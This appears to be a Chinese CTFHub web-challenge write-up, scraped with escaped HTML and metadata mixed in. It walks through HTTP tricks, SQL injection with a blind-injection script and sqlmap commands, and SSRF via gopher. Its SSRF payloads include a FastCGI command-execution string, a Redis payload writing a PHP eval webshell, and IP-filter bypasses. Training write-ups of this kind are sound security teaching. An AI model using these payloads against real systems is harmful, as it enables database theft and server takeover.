![\"\"](\"\/2022\/08\/1-4.png\")
<\/div><\/figure>\n\n\n\n\u8fdb\u5165\u4e3b\u9875\uff0c\u9898\u76ee\u4e0a\u7684\u610f\u601d\u53ef\u80fd\u662f\u8ba9\u6211\u4eec\u7528CTFHUB\u7684\u65b9\u6cd5\u8bbf\u95ee\u8be5\u7f51\u9875\uff0c\u7528curl -X CTFHUB\u6216\u8005burpsuite\u6539\u65b9\u6cd5\u90fd\u53ef\u4ee5<\/p>\n\n\n\n \u9898\u76ee\u63cf\u8ff0\uff1aHTTP\u4e34\u65f6\u91cd\u5b9a\u5411<\/p>\n\n\n\n \u9898\u76ee\u91cc\u8bf4flag\u4e0d\u5728\u8fd9\u91cc\uff0c\u4e5f\u5c31\u662f\u8bf4\u4e0d\u5728index.html\u91cc\uff0c\u70b9\u51fbgive me the flag\u8df3\u8f6c\u5230index.php\u53bb\uff0c\u4f46\u7f51\u9875\u91cc\u6ca1\u6709flag\uff0c\u76f4\u63a5\u6293\u5305\u6216\u8005curl -i\u90fd\u53ef\u4ee5\u770b\u5230index.php\u91cc\u7684flag<\/p>\n\n\n\n \u9898\u76ee\u63cf\u8ff0\uff1aCookie\u6b3a\u9a97\u3001\u8ba4\u8bc1\u3001\u4f2a\u9020<\/p>\n\n\n\n \u6574\u6570\u578b\u6ce8\u5165<\/strong><\/p>\n\n\n\n 2\u67093\u6ca1\u6709\uff0c\u663e\u7136\u8868\u7684\u5b57\u6bb5\u4e2a\u6570\u4e3a2.<\/p>\n\n\n\n -1 union select 1,database() \u7206\u5e93<\/p>\n\n\n\n -1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() \u7206\u8868\uff0c\u7206\u51fa\u6765flag\u548cnews\u4e24\u4e2a\u8868\uff0c\u663e\u7136flag\u5728flag\u8868\u91cc<\/p>\n\n\n\n -1 union select 1,group_concat(column_name) from information_schema.columns where table_schema=’sqli’ and table_name=’flag’ \u7206\u5b57\u6bb5<\/p>\n\n\n\n -1 union select 1,flag from flag \u62ffflag\u8868\u91ccflag\u5b57\u6bb5\u4e0b\u7684\u6570\u636e<\/p>\n\n\n\n \u5b57\u7b26\u578b\u6ce8\u5165<\/strong><\/p>\n\n\n\n \u5b57\u7b26\u578b\u6ce8\u5165\u548c\u6574\u6570\u578b\u6ce8\u5165\u5dee\u522b\u4fbf\u51fa\u6765\u4e86\uff0c\u8fd9\u91cc\u76f8\u5f53\u4e8e\u662f\u5b57\u7b261\uff0c\u6240\u4ee5\u6709\u62ec\u53f7\uff0c\u800c\u4e0a\u9762\u662f\u6570\u5b571\uff0c\u4e0d\u8fc7\u4ece\u6211\u4eec\u653b\u51fb\u8005\u7684\u89d2\u5ea6\u4e3b\u8981\u5dee\u522b\u4e5f\u5c31\u662f\u8fd9\u4e2a\u5355\u5f15\u53f7\u4e86\uff0c\u6ce8\u610f\u95ed\u5408\u548c\u6ce8\u91ca\u5373\u53ef\uff0c\u6ce8\u5165\u6d41\u7a0b\u51e0\u4e4e\u540c\u4e0a\u3002<\/p>\n\n\n\n 1′ order by 2 # \u5224\u65ad\u8868\u7684\u5b57\u6bb5\u4e2a\u6570<\/p>\n\n\n\n \u663e\u7136\u5b57\u6bb5\u4e2a\u6570\u540c\u4e0a\uff0c\u4e3a2\u3002<\/p>\n\n\n\n -1′ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() # \u7206\u8868<\/p>\n\n\n\n -1′ union select 1,group_concat(column_name) from information_schema.columns where table_name=’flag’ # \u7206flag\u8868\u91cc\u7684\u5b57\u6bb5<\/p>\n\n\n\n -1′ union select 1,flag from flag #<\/p>\n\n\n\n \u62a5\u9519\u6ce8\u5165<\/strong><\/p>\n\n\n\n \u53ef\u4ee5\u770b\u5230\u73b0\u5728\u5982\u679c\u8f93\u5165\u6b63\u786e\u7684\u6570\u5b57\uff0c\u4ed6\u4f1a\u663e\u793a\u67e5\u8be2\u6b63\u786e\uff0c\u800c\u5982\u679c\u8f93\u5165\u9519\u8bef\uff0c\u4ed6\u5219\u4f1a\u663e\u793a\u9519\u8bef\u4fe1\u606f\uff0c\u6bd4\u5982\u8fd9\u91cc\u4ed6\u5c31\u4f1a\u8bf4\u5b57\u6bb5dingzhen\u5728’where clause’\u4e0d\u5b58\u5728\uff0c\u56e0\u6b64\u6211\u4eec\u53ef\u4ee5\u5229\u7528\u8fd9\u4e00\u70b9\u7528\u663e\u793a\u7684\u62a5\u9519\u83b7\u53d6\u654f\u611f\u4fe1\u606f\u3002<\/p>\n\n\n\n id=1 and extractvalue(1,concat(‘^’,(select database()),’^’)) \u7206\u5e93\uff08\u8fd9\u91cc\u5728\u62a5\u9519\u4e2d\u4e4b\u524d\u6267\u884c\u4e86select database()\uff0c\u8ba9\u6211\u4eec\u83b7\u5f97\u4e86\u5e93\u540d\uff0c\u8fd9\u5c31\u662f\u6211\u4eec\u7684\u5229\u7528\u70b9\uff09<\/p>\n\n\n\n 1 and updatexml(1,concat(‘^’,(select table_name from information_schema.tables where table_schema=’sqli’ ),’^’),1) \u7206\u8868<\/p>\n\n\n\n \u5b83\u8bf4\u663e\u793a\u5185\u5bb9\u4e0d\u80fd\u8d85\u8fc7\u4e00\u884c\uff0c\u6240\u4ee5\u6211\u4eec\u8981\u5728\u5e93\u540d\u540e\u9762\u7528limit 0,1\u9650\u5236\u663e\u793a\u7b2c\u4e00\u884c,\u7528limit 1,2\u5373\u7b2c\u4e8c\u884c<\/p>\n\n\n\n 1 and updatexml(1,concat(‘^’,(select table_name from information_schema.tables where table_schema=’sqli’ limit 0,1 ),’^’),1) \u771f*\u7206\u8868<\/p>\n\n\n\n 1 and updatexml(1,concat(‘^’,(select column_name from information_schema.columns where table_name=’flag’ and table_schema=’sqli’ limit 0,1 ),’^’),1) \u7206\u5b57\u6bb5<\/p>\n\n\n\n 1 and updatexml(1,concat(‘^’,(select flag from flag limit 0,1 ),’^’),1) \u7206\u5b57\u6bb5\u4e0b\u7684\u5185\u5bb9<\/p>\n\n\n\n \u53f3\u8fb9\u5c11\u4e86\u4e00\u4e2a\u62ec\u53f7\uff0c\u8865\u4e0a\u5c31\u662f\u5b8c\u6574\u7684flag<\/p>\n\n\n\n \u5e03\u5c14\u76f2\u6ce8<\/strong><\/p>\n\n\n\n \u53ef\u4ee5\u770b\u5230\u73b0\u5728\u8f93\u5165id\u9875\u9762\u91cc\u53ea\u4f1a\u663e\u793a\u67e5\u8be2\u6210\u529f\u8fd8\u662f\u5931\u8d25\uff0c\u6ca1\u6709\u660e\u663e\u7684\u56de\u663e\uff0c\u4f46\u6211\u4eec\u53ef\u4ee5\u7528\u4e8c\u5206\u6cd5\u6765\u5224\u65ad\u6bcf\u4e2a\u5b57\u6bcd\u3002<\/p>\n\n\n\n \u8fd9\u4e2a\u9898\u53ef\u4ee5\u76f4\u63a5\u7528sqlmap\uff0c\u7b80\u5355\u7684\u6279\u7206<\/p>\n\n\n\n \u6216\u8005\u4e5f\u53ef\u4ee5\u7528\u5199\u811a\u672c\u6765\u89e3\u51b3\uff08\u7f51\u4e0a\u627e\u7684\uff09<\/p>\n\n\n\n \u76f4\u63a5\u6784\u9020\u5373\u53ef\u8bbf\u95eeflag\uff0c\u540e\u7aef\u4ee3\u7801\u5e94\u8be5\u662f\u4ee5\u670d\u52a1\u5668\u8bf7\u6c42\u7f51\u9875\uff0c\u6240\u4ee5\u6211\u4eec\u8fd9\u91cc\u8bf7\u6c42127.0.0.1\/flag.php\u5373\u53ef\u83b7\u5f97\u5185\u7f51\u7684\u8d44\u6e90<\/p>\n\n\n\n \u626b\u4e00\u4e0b\u7aef\u53e3\uff1a<\/p>\n\n\n\n \u7aef\u53e3\u4f1a\u53d8\u5316\u7684\uff0c\u505a\u7684\u65f6\u5019\u81ea\u5df1\u53bb\u626b\u626b\uff0c8000\u52309000<\/p>\n\n\n\n \u56e0\u4e3a\u53ea\u80fd\u4ece127.0.0.1\u8bbf\u95ee\uff0c\u6211\u4eec\u53ef\u4ee5\u60f3\u5230index.php\u91cc\u90a3\u4e2acurl\u51fd\u6570\uff0c\u5148\u83b7\u5f97key\uff0c\u7136\u540ePOST\u5f97\u5230\u7684key\u5373\u53ef\uff1a<\/p>\n\n\n\n \u7136\u540e\u628a\u5e76\u628a%0A\u66ff\u6362\u6210%0d%0A\uff0c\u7ed3\u5c3e\u52a0\u4e0a%0d%0A,\u5e76\u4e14\u672b\u5c3e\u8981\u52a0\u4e0a%0d%0a\uff08\\r\\n\uff09<\/strong><\/p>\n\n\n\n \u7136\u540e\u518d\u7f16\u4e00\u6b21\u7801<\/p>\n\n\n\n \u8bbf\u95ee?\/url=127.0.0.1\/flag.php\uff0c\u6539\u524d\u7aef\u589e\u52a0\u63d0\u4ea4\u6309\u94ae<\/p>\n\n\n\n \u4e0a\u4f20\u540e\u63d0\u793a\u6211\u4eec\u53ea\u80fd\u4ece127.0.0.1\u4e0a\u4f20\uff0c\u7528gopher\u534f\u8bae\u4f2a\u9020\u4ece127.0.01post\u4e00\u4e2a\u6587\u4ef6\u7684\u5305\u5373\u53ef<\/p>\n\n\n\n \u6700\u540e\uff0c\u4e0a\u4f20txt\u7684\u89e3\u6790\u4f1a\u51fa\u95ee\u9898\uff0c\u4e0d\u77e5\u9053\u4e3a\u4ec0\u4e48\uff0c\u6240\u4ee5\u5efa\u8bae\u4e0a\u4f20php<\/p>\n\n\n\n \u7528gopherus\u5373\u53ef\uff1a<\/p>\n\n\n\n \u7136\u540e\u5bf9_\u540e\u9762\u7684payload\u8fdb\u884c\u4e00\u6b21url\u7f16\u7801<\/p>\n\n\n\n \u5bf9_\u540e\u9762\u8fdb\u884c\u7f16\u7801\u3002<\/p>\n\n\n\n \u5341\u8fdb\u5236\u88abban\u4e86\u6362\u5176\u4ed6\u8fdb\u5236\u5373\u53ef<\/p>\n\n\n\n \u867d\u7136\u8fd9\u91ccban\u4e86127|172|10|192\uff0c\u4f46\u7ed5\u8fc7\u65b9\u6cd5\u633a\u591a\u7684\uff0c\u53ef\u4ee5\u7528\/?url=0\/flag.php\uff0c\u56e0\u4e3a0\u5728linux\u6307\u5411127.0.0.1\uff0c\u5728windows\u6307\u54110.0.0.0\uff0c\u4e5f\u53ef\u4ee5\u7528?url=localhost\/flag.php\uff0c\u5f53\u7136\u6b63\u7edf\u505a\u6cd5\u662f\u627e\u4e2a\u7f51\u7ad9\u653e\u4e2a302\u7f51\u9875\u8df3\u8f6c\u5411127.0.0.1<\/p>\n\n\n\n web\u524d\u7f6e\u6280\u80fd HTTP\u534f\u8bae \u8bf7\u6c42\u65b9\u5f0f \u9898\u76ee\u63cf\u8ff0\uff1aHTTP \u8bf7\u6c42\u65b9\u6cd5, HTTP\/1.1\u534f\u8bae\u4e2d\u5171\u5b9a\u4e49\u4e86\u516b\u79cd\u65b9\u6cd5 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-61","post","type-post","status-publish","format-standard","hentry","category-6"],"_links":{"self":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/61","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/comments?post=61"}],"version-history":[{"count":10,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/61\/revisions"}],"predecessor-version":[{"id":1580,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/61\/revisions\/1580"}],"wp:attachment":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/media?parent=61"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/categories?post=61"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/tags?post=61"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}![\"\"](\"\/2022\/08\/1-5-1024x243.png\")
<\/div><\/figure>\n\n\n\n302\u8df3\u8f6c<\/h3>\n\n\n\n
![\"\"](\"\/2022\/08\/2-3-1024x783.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"\/2022\/08\/3-3.png\")
<\/div><\/figure>\n\n\n\nCookie<\/h3>\n\n\n\n
Sql\u6ce8\u5165<\/h2>\n\n\n\n
![\"\"](\"\/2022\/09\/1-1024x287.png\")
<\/div><\/figure>\n\n\n\n1 order by 2<\/code> \u5224\u65ad\u8868\u7684\u5b57\u6bb5\u4e2a\u6570<\/p>\n\n\n\n![\"\"](\"\/2022\/09\/2-1024x185.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"\/2022\/09\/3-1024x140.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"\/2022\/09\/4-1024x223.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"\/2022\/09\/5-1024x177.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"\/2022\/09\/6-1024x143.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"\/2022\/09\/7-1024x130.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"\/2022\/09\/1-1-1024x114.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"\/2022\/09\/2-3.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"\/2022\/09\/3-1-1024x130.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"\/2022\/09\/4-1-1024x85.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"\/2022\/09\/1-2.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"\/2022\/09\/1-3.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"\/2022\/09\/1-4.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"\/2022\/09\/1-5.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"\/2022\/09\/1-6-1024x99.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"\/2022\/09\/1-7-1024x102.png\")
<\/div>![\"\"](\"\/2022\/09\/1-8-1024x90.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"\/2022\/09\/1-9-1024x105.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"\/2022\/09\/1-10.png\")
<\/div><\/figure>\n\n\n\n![\"\"](\"\/2022\/09\/2-4.png\")
<\/div><\/figure>\n\n\n\nsqlmap -u \"url\" --dbs \nsqlmap -u \"url\" -D [\u4e0a\u4e00\u6b65\u5f97\u5230\u7684\u6570\u636e\u5e93\u540d] --tables\nsqlmap -u \"url\" -D [\u4e0a\u4e00\u6b65\u5f97\u5230\u7684\u6570\u636e\u5e93\u540d] -T [\u4e0a\u4e00\u6b65\u5f97\u5230\u7684\u8868\u660e] --columns \nsqlmap -u \"url\" -D [\u4e0a\u4e00\u6b65\u5f97\u5230\u7684\u6570\u636e\u5e93\u540d] -T [\u4e0a\u4e00\u6b65\u5f97\u5230\u7684\u8868\u660e] -C [\u4e0a\u4e00\u6b65\u5f97\u5230\u7684\u5217\u540d] --dump<\/code><\/pre>\n\n\n\nimport requests\nimport time\n\nurlOPEN = 'http:\/\/challenge-a939293d6fe04bd8.sandbox.ctfhub.com:10800?id='\nstarOperatorTime = []\nmark = 'query_success'\n\n\ndef database_name():\n name = ''\n for j in range(1, 9):\n for i in 'sqcwertyuioplkjhgfdazxvbnm':\n url = urlOPEN + 'if(substr(database(),%d,1)=\"%s\",1,(select table_name from information_schema.tables))' % (\n j, i)\n # print(url+'%23')\n r = requests.get(url)\n if mark in r.text:\n name = name + i\n\n print(name)\n\n break\n print('database_name:', name)\n\n\ndatabase_name()\n\n\ndef table_name():\n list = []\n for k in range(0, 4):\n name = ''\n for j in range(1, 9):\n for i in 'sqcwertyuioplkjhgfdazxvbnm':\n url = urlOPEN + 'if(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1)=\"%s\",1,(select table_name from information_schema.tables))' % (\n k, j, i)\n # print(url+'%23')\n r = requests.get(url)\n if mark in r.text:\n name = name + i\n break\n list.append(name)\n print('table_name:', list)\n\n\n# start = time.time()\ntable_name()\n\n\n# stop = time.time()\n# starOperatorTime.append(stop-start)\n# print(\"\u6240\u7528\u7684\u5e73\u5747\u65f6\u95f4\uff1a \" + str(sum(starOperatorTime)\/100))\n\n\ndef column_name():\n list = []\n for k in range(0, 3): # \u5224\u65ad\u8868\u91cc\u6700\u591a\u67094\u4e2a\u5b57\u6bb5\n name = ''\n for j in range(1, 9): # \u5224\u65ad\u4e00\u4e2a \u5b57\u6bb5\u540d\u6700\u591a\u67099\u4e2a\u5b57\u7b26\u7ec4\u6210\n for i in 'sqcwertyuioplkjhgfdazxvbnm':\n url = urlOPEN + 'if(substr((select column_name from information_schema.columns where table_name=\"flag\"and table_schema= database() limit %d,1),%d,1)=\"%s\",1,(select table_name from information_schema.tables))' % (\n k, j, i)\n r = requests.get(url)\n if mark in r.text:\n name = name + i\n break\n list.append(name)\n print('column_name:', list)\n\n\ncolumn_name()\n\n\ndef get_data():\n name = ''\n for j in range(1, 50): # \u5224\u65ad\u4e00\u4e2a\u503c\u6700\u591a\u670951\u4e2a\u5b57\u7b26\u7ec4\u6210\n for i in range(48, 126):\n url = urlOPEN + 'if(ascii(substr((select flag from flag),%d,1))=%d,1,(select table_name from information_schema.tables))' % (\n j, i)\n r = requests.get(url)\n if mark in r.text:\n name = name + chr(i)\n print(name)\n break\n print('value:', name)\n\n\nget_data()<\/code><\/pre>\n\n\n\nSSRF<\/h2>\n\n\n\n
\u5185\u7f51\u8bbf\u95ee<\/h3>\n\n\n\n
?url=127.0.0.1\/flag.php<\/code><\/pre>\n\n\n\n\u4f2a\u534f\u8bae\u8bfb\u53d6\u6587\u4ef6<\/h3>\n\n\n\n
file:\/\/ \u534f\u8bae\n\u4f5c\u7528\uff1a\n\u7528\u4e8e\u8bbf\u95ee\u672c\u5730\u6587\u4ef6\u7cfb\u7edf\uff0c\u5728CTF\u4e2d\u901a\u5e38\u7528\u6765\u8bfb\u53d6\u672c\u5730\u6587\u4ef6\u7684\u4e14\u4e0d\u53d7allow_url_fopen\u4e0eallow_url_include\u7684\u5f71\u54cd\u3002\n\nhttp\/s\u534f\u8bae\n\u4f5c\u7528\uff1a\n\u63a2\u6d4b\u5185\u7f51\u4e3b\u673a\u5b58\u6d3b\n\ndict\u534f\u8bae\n\u4f5c\u7528\uff1a\n\u6cc4\u9732\u5b89\u88c5\u8f6f\u4ef6\u7248\u672c\u4fe1\u606f\uff0c\u67e5\u770b\u7aef\u53e3\uff0c\u64cd\u4f5c\u5185\u7f51redis\u670d\u52a1\u7b49\n\nGopher\u534f\u8bae\n\u4f5c\u7528\uff1a\nGopher\u534f\u8bae\u53ef\u4ee5\u8bf4\u662fSSRF\u4e2d\u7684\u4e07\u91d1\u6cb9\u3002\u5229\u7528\u6b64\u534f\u8bae\u53ef\u4ee5\u653b\u51fb\u5185\u7f51\u7684 Redis\u3001Mysql\u3001FastCGI\u3001Ftp\u7b49\u7b49\uff0c\u4e5f\u53ef\u4ee5\u53d1\u9001 GET\u3001POST \u8bf7\u6c42\u3002\u8fd9\u65e0\u7591\u6781\u5927\u62d3\u5bbd\u4e86 SSRF \u7684\u653b\u51fb\u9762\u3002\n<\/code><\/pre>\n\n\n\n?url=file:\/\/\/var\/www\/html\/flag.php<\/code><\/pre>\n\n\n\n\u7aef\u53e3\u626b\u63cf<\/h3>\n\n\n\n
![\"\"](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-34-1024x702.png\")
<\/div><\/figure>\n\n\n\nPOST\u8bf7\u6c42<\/h3>\n\n\n\n
?url=file:\/\/\/var\/www\/html\/index.php<\/code><\/pre>\n\n\n\n<?php\n\nerror_reporting(0);\n\nif (!isset($_REQUEST['url'])){\n header(\"Location: \/?url=_\");\n exit;\n}\n\n$ch = curl_init();\ncurl_setopt($ch, CURLOPT_URL, $_REQUEST['url']);\ncurl_setopt($ch, CURLOPT_HEADER, 0);\ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\ncurl_exec($ch);\ncurl_close($ch);<\/code><\/pre>\n\n\n\n?url=file:\/\/\/var\/www\/html\/flag.php<\/code><\/pre>\n\n\n\n<?php\n\nerror_reporting(0);\n\nif ($_SERVER[\"REMOTE_ADDR\"] != \"127.0.0.1\") {\n echo \"Just View From 127.0.0.1\";\n return;\n}\n\n$flag=getenv(\"CTFHUB\");\n$key = md5($flag);\n\nif (isset($_POST[\"key\"]) && $_POST[\"key\"] == $key) {\n echo $flag;\n exit;\n}\n?><\/code><\/pre>\n\n\n\n?url=127.0.0.1\/flag.php<\/code><\/pre>\n\n\n\n\n<form action=\"\/flag.php\" method=\"post\">\n<input type=\"text\" name=\"key\">\n<!-- Debug: key=78806c38ff272b57b63f8344f8df9fdd-->\n<\/form><\/code><\/pre>\n\n\n\ngopher:\/\/127.0.0.1:80\/_POST \/flag.php HTTP\/1.1\nHost: 127.0.0.1:80\nContent-Type: application\/x-www-form-urlencoded\nContent-Length: 36\n\nkey=78806c38ff272b57b63f8344f8df9fdd\n<\/code><\/pre>\n\n\n\ngopher:\/\/127.0.0.1:80\/_POST%20\/flag.php%20HTTP\/1.1%0AHost:%20127.0.0.1:80%0AContent-Type:%20application\/x-www-form-urlencoded%0AContent-Length:%2036%0A%0Akey=78806c38ff272b57b63f8344f8df9fdd\n<\/code><\/pre>\n\n\n\ngopher:\/\/127.0.0.1:80\/_POST%20\/flag.php%20HTTP\/1.1%0d%0AHost:%20127.0.0.1:80%0d%0AContent-Type:%20application\/x-www-form-urlencoded%0d%0AContent-Length:%2036%0d%0A%0d%0Akey=78806c38ff272b57b63f8344f8df9fdd%0d%0a\n<\/code><\/pre>\n\n\n\ngopher:\/\/127.0.0.1:80\/_POST%2520%2Fflag.php%2520HTTP%2F1.1%250d%250AHost%3A%2520127.0.0.1%3A80%250d%250AContent-Type%3A%2520application%2Fx-www-form-urlencoded%250d%250AContent-Length%3A%252036%250d%250A%250d%250Akey%3D78806c38ff272b57b63f8344f8df9fdd%250d%250a<\/code><\/pre>\n\n\n\n![\"\"](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-35-1024x415.png\")
<\/div><\/figure>\n\n\n\n\u4e0a\u4f20\u6587\u4ef6<\/h3>\n\n\n\n
<input type=\"submit\" name=\"submit\"><\/code><\/pre>\n\n\n\n![\"\"](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-36.png\")
<\/div><\/figure>\n\n\n\nimport urllib.parse\n\n\npayload =\\\n\"\"\"\nPOST \/flag.php HTTP\/1.1\nHost: challenge-c30322a8a90c0c06.sandbox.ctfhub.com:10800\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko\/20100101 Firefox\/112.0\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8\nAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\nAccept-Encoding: gzip, deflate\nContent-Type: multipart\/form-data; boundary=---------------------------2444789648817313102994520886\nContent-Length: 354\nOrigin: http:\/\/challenge-c30322a8a90c0c06.sandbox.ctfhub.com:10800\nConnection: close\nReferer: http:\/\/challenge-c30322a8a90c0c06.sandbox.ctfhub.com:10800\/?url=127.0.0.1\/flag.php\nUpgrade-Insecure-Requests: 1\n\n-----------------------------2444789648817313102994520886\nContent-Disposition: form-data; name=\"file\"; filename=\"1.php\"\nContent-Type: application\/octet-stream\n\n11111\n-----------------------------2444789648817313102994520886\nContent-Disposition: form-data; name=\"submit\"\n\n\u00e6\u008f\u0090\u00e4\u00ba\u00a4\u00e6\u009f\u00a5\u00e8\u00af\u00a2\n-----------------------------2444789648817313102994520886--\n\"\"\"\n\n#\u6ce8\u610f\u540e\u9762\u4e00\u5b9a\u8981\u6709\u56de\u8f66\uff0c\u56de\u8f66\u7ed3\u5c3e\u8868\u793ahttp\u8bf7\u6c42\u7ed3\u675f\ntmp = urllib.parse.quote(payload)\nnew = tmp.replace('%0A','%0D%0A')\nresult = 'gopher:\/\/127.0.0.1:80\/'+'_'+new\nresult = urllib.parse.quote(result)\nprint(result) <\/code><\/pre>\n\n\n\nhttp://challenge-c30322a8a90c0c06.sandbox.ctfhub.com:10800\/?url=gopher%3A\/\/127.0.0.1%3A80\/_%250D%250APOST%2520\/flag.php%2520HTTP\/1.1%250D%250AHost%253A%2520challenge-c30322a8a90c0c06.sandbox.ctfhub.com%253A10800%250D%250AUser-Agent%253A%2520Mozilla\/5.0%2520%2528Windows%2520NT%252010.0%253B%2520Win64%253B%2520x64%253B%2520rv%253A109.0%2529%2520Gecko\/20100101%2520Firefox\/112.0%250D%250AAccept%253A%2520text\/html%252Capplication\/xhtml%252Bxml%252Capplication\/xml%253Bq%253D0.9%252Cimage\/avif%252Cimage\/webp%252C%252A\/%252A%253Bq%253D0.8%250D%250AAccept-Language%253A%2520zh-CN%252Czh%253Bq%253D0.8%252Czh-TW%253Bq%253D0.7%252Czh-HK%253Bq%253D0.5%252Cen-US%253Bq%253D0.3%252Cen%253Bq%253D0.2%250D%250AAccept-Encoding%253A%2520gzip%252C%2520deflate%250D%250AContent-Type%253A%2520multipart\/form-data%253B%2520boundary%253D---------------------------2444789648817313102994520886%250D%250AContent-Length%253A%2520354%250D%250AOrigin%253A%2520http%253A\/\/challenge-c30322a8a90c0c06.sandbox.ctfhub.com%253A10800%250D%250AConnection%253A%2520close%250D%250AReferer%253A%2520http%253A\/\/challenge-c30322a8a90c0c06.sandbox.ctfhub.com%253A10800\/%253Furl%253D127.0.0.1\/flag.php%250D%250AUpgrade-Insecure-Requests%253A%25201%250D%250A%250D%250A-----------------------------2444789648817313102994520886%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522file%2522%253B%2520filename%253D%25221.php%2522%250D%250AContent-Type%253A%2520application\/octet-stream%250D%250A%250D%250A11111%250D%250A-----------------------------2444789648817313102994520886%250D%250AContent-Disposition%253A%2520form-data%253B%2520name%253D%2522submit%2522%250D%250A%250D%250A%25C3%25A6%25C2%258F%25C2%2590%25C3%25A4%25C2%25BA%25C2%25A4%25C3%25A6%25C2%259F%25C2%25A5%25C3%25A8%25C2%25AF%25C2%25A2%250D%250A-----------------------------2444789648817313102994520886--%250D%250A<\/code><\/pre>\n\n\n\nFastCGI\u534f\u8bae<\/h3>\n\n\n\n
![\"\"](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-37.png\")
<\/div><\/figure>\n\n\n\n?url=gopher:\/\/127.0.0.1:9000\/_%2501%2501%2500%2501%2500%2508%2500%2500%2500%2501%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2500%25F6%2506%2500%250F%2510SERVER_SOFTWAREgo%2520%2F%2520fcgiclient%2520%250B%2509REMOTE_ADDR127.0.0.1%250F%2508SERVER_PROTOCOLHTTP%2F1.1%250E%2502CONTENT_LENGTH59%250E%2504REQUEST_METHODPOST%2509KPHP_VALUEallow_url_include%2520%253D%2520On%250Adisable_functions%2520%253D%2520%250Aauto_prepend_file%2520%253D%2520php%253A%2F%2Finput%250F%2509SCRIPT_FILENAMEindex.php%250D%2501DOCUMENT_ROOT%2F%2500%2500%2500%2500%2500%2500%2501%2504%2500%2501%2500%2500%2500%2500%2501%2505%2500%2501%2500%253B%2504%2500%253C%253Fphp%2520system%2528%2527cat%2520%2Ff%252A%2527%2529%253Bdie%2528%2527-----Made-by-SpyD3r-----%250A%2527%2529%253B%253F%253E%2500%2500%2500%2500<\/code><\/pre>\n\n\n\nRedis\u534f\u8bae<\/h3>\n\n\n\n
?url=gopher:\/\/127.0.0.1:6379\/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252430%250D%250A%250A%250A%253C%253Fphp%2520eval%2528%2524_POST%255Bcmd%255D%2529%253B%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A<\/code><\/pre>\n\n\n\n![\"\"](\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/image.png\")
<\/div><\/figure>\n\n\n\nURL Bypass<\/h3>\n\n\n\n
?url=http:\/\/notfound.ctfhub.com@127.0.0.1\/flag.php<\/code><\/pre>\n\n\n\n\u6570\u5b57IP Bypass<\/h3>\n\n\n\n
\u516b\u8fdb\u5236\uff1a0177.000.000.001\r\n\u5341\u8fdb\u5236\uff1a127.0.0.1\r\n\u5341\u516d\u8fdb\u5236\uff1a0x7f000001<\/code><\/pre>\n\n\n\n?url=0x7f000001\/flag.php<\/code><\/pre>\n\n\n\n302\u8df3\u8f6c Bypass<\/h3>\n\n\n\n
